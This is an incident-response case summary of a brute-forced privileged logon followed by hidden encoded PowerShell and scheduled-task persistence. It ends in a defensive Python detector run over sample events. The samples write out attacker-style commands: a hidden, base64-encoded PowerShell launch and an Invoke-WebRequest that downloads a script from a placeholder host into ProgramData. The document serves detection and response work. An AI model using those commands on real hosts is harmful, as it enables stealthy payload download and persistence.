Authentication abuse to PowerShell execution.
This plain-language view shows the case without raw telemetry. One external source repeatedly failed to log in, then successfully accessed a privileged account and began hidden post-authentication activity on the host.
Basic overview
The case matters because the same external source that generated repeated failed logons later succeeded against a privileged account, the signature of credential guessing that eventually landed rather than a user mistyping a password. That access was followed within minutes by hidden, encoded PowerShell, outbound communication, file creation, and a persistence step.
Findings
Repeated authentication failures from a single external IP
Five failed logons (Windows Security event 4625) were recorded from 203.0.113.24 before the same source logged on successfully to a privileged account.
Suspicious success after failures
A successful network logon (Windows Security event 4624, logon type 3) for it-admin followed the failure sequence from the same source IP, which ties the privileged access directly to the failed attempts rather than to a separate session.
Encoded PowerShell execution
Sysmon process creation telemetry (event ID 1) captured PowerShell launched through cmd.exe with a hidden window and a base64-encoded command; both options conceal what was run from anyone looking at the console or at a casual command-line review.
Follow-on activity consistent with persistence staging
The host then made outbound connections, wrote a PowerShell script under ProgramData, and registered a scheduled task, the usual sequence for staging a payload on disk and giving it a way to run again after a reboot or logoff.
Recommended analyst actions
- Reset the compromised it-admin account, invalidate its existing sessions, and rotate any credentials that were reused elsewhere.
- Block the source IP and the outbound destination IP, then review both for any other traffic in the same period.
- Review scheduled tasks, PowerShell logs (including script block logging), and other hosts for the same indicators: the source IP, the script under ProgramData, the task name, and the outbound destination.
- Tune detections for failed-logon bursts followed by a success from the same source, encoded PowerShell with a hidden window, and scheduled task creation shortly after a privileged logon.
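The three detections listed above, chained the way this case unfolded, as an added example rather than part of the case record: Python run over constructed sample events shaped like the findings. The event IDs (Security 4625, 4624, 4698 and Sysmon 1) are Windows' own; the host name ws01, the stage-two script and the 198.51.100.7 destination are placeholders assumed for the sample, and the event timestamps follow the timeline summary.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Privileged accounts that turn a brute-force success into a high-severity alert.
PRIVILEGED_ACCOUNTS = {"it-admin"}


def encode_command(script):
    """powershell.exe -EncodedCommand expects base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical stage-two script; 198.51.100.7 is a documentation-range placeholder.
STAGE_TWO = "Invoke-WebRequest http://198.51.100.7/u.ps1 -OutFile C:\\ProgramData\\svc\\u.ps1"

# Constructed sample events shaped like the case summary (not real telemetry).
# Security 4625 = failed logon, 4624 = successful logon (logon_type 3 = network),
# Sysmon 1 = process creation, Security 4698 = scheduled task created.
SAMPLE_EVENTS = [
    {"time": t, "event_id": 4625, "host": "ws01", "user": "it-admin", "src_ip": "203.0.113.24"}
    for t in ("2026-03-09T08:11:05Z", "2026-03-09T08:11:41Z", "2026-03-09T08:12:20Z",
              "2026-03-09T08:13:03Z", "2026-03-09T08:13:48Z")
] + [
    {"time": "2026-03-09T08:14:02Z", "event_id": 4624, "host": "ws01", "user": "it-admin",
     "src_ip": "203.0.113.24", "logon_type": 3},
    {"time": "2026-03-09T08:14:40Z", "event_id": 1, "host": "ws01",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_command(STAGE_TWO)},
    {"time": "2026-03-09T08:16:10Z", "event_id": 4698, "host": "ws01", "user": "it-admin",
     "task_name": "\\svc\\Updater"},
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def _switch_value(command_line, name):
    """Return the argument following a switch that abbreviates `name`, or None.
    powershell.exe accepts any unambiguous prefix of a switch, so -enc, -ec and
    -e all mean -EncodedCommand and -w means -WindowStyle; -ep (ExecutionPolicy)
    is not a prefix of 'encodedcommand' and is correctly ignored."""
    for m in re.finditer(r"(?:^|\s)-([A-Za-z]+)(?:\s+([^-\s]\S*))?", command_line):
        if name.startswith(m.group(1).lower()):
            return m.group(2)
    return None


def decode_encoded_powershell(command_line):
    """Decode an -EncodedCommand payload (base64 of UTF-16LE); None if absent or malformed."""
    blob = _switch_value(command_line, "encodedcommand")
    if not blob:
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def brute_force_then_success(events, threshold=5, window=timedelta(minutes=10)):
    """Flag a source IP with >= threshold failed logons followed, within `window`,
    by a network logon to a privileged account from the same IP."""
    failures, alerts = defaultdict(list), []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = _ts(ev["time"])
        if ev["event_id"] == 4625:
            failures[ev["src_ip"]].append(t)
        elif ev["event_id"] == 4624 and ev.get("logon_type") == 3:
            recent = [f for f in failures[ev["src_ip"]] if t - f <= window]
            if len(recent) >= threshold and ev["user"] in PRIVILEGED_ACCOUNTS:
                alerts.append({"src_ip": ev["src_ip"], "user": ev["user"], "host": ev["host"],
                               "failures": len(recent), "success_at": ev["time"]})
    return alerts


def suspicious_powershell(events):
    """Sysmon process-creation events carrying -EncodedCommand, with the decoded
    script, whether the window was hidden, and the parent process."""
    hits = []
    for ev in events:
        if ev["event_id"] != 1:
            continue
        decoded = decode_encoded_powershell(ev["command_line"])
        if decoded is None:
            continue
        hidden = (_switch_value(ev["command_line"], "windowstyle") or "").lower() == "hidden"
        hits.append({"host": ev["host"], "time": ev["time"], "parent": ev["parent_image"],
                     "hidden": hidden, "decoded": decoded})
    return hits


def triage(events, window=timedelta(minutes=10)):
    """Chain the signals per host: privileged logon after a failed-logon burst,
    then encoded PowerShell and scheduled-task creation inside the same window."""
    chains = []
    for alert in brute_force_then_success(events, window=window):
        start = _ts(alert["success_at"])

        def in_window(ev):
            delta = (_ts(ev["time"]) - start).total_seconds()
            return ev["host"] == alert["host"] and 0 <= delta <= window.total_seconds()

        chains.append({**alert,
                       "encoded_powershell": [h for h in suspicious_powershell(events) if in_window(h)],
                       "scheduled_tasks": [e for e in events if e["event_id"] == 4698 and in_window(e)]})
    return chains


if __name__ == "__main__":
    for chain in triage(SAMPLE_EVENTS):
        print(f"{chain['src_ip']} -> {chain['user']}@{chain['host']} after {chain['failures']} failures")
        for hit in chain["encoded_powershell"]:
            print(f"  hidden={hit['hidden']} parent={hit['parent']}\n  decoded: {hit['decoded']}")
        for task in chain["scheduled_tasks"]:
            print(f"  scheduled task: {task['task_name']} at {task['time']}")
```

The decoder is the piece worth keeping even if the rest is replaced by a SIEM rule: the encoded form hides the ProgramData path and the download destination from any search on the raw command line, and prefix-abbreviated switches (-e, -ec, -w h...) defeat rules that match only the literal -EncodedCommand. The correlation window and threshold are starting values to tune against your own logon volume.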
Timeline summary
- 09 Mar 2026, 08:11 UTC: repeated failed logons begin from one external source.
- 09 Mar 2026, 08:14 UTC: the same source achieves a successful privileged logon.
- 09 Mar 2026, 08:14 UTC: hidden encoded PowerShell starts running.
- 09 Mar 2026, 08:16 UTC: the sequence ends with persistence staging on the host.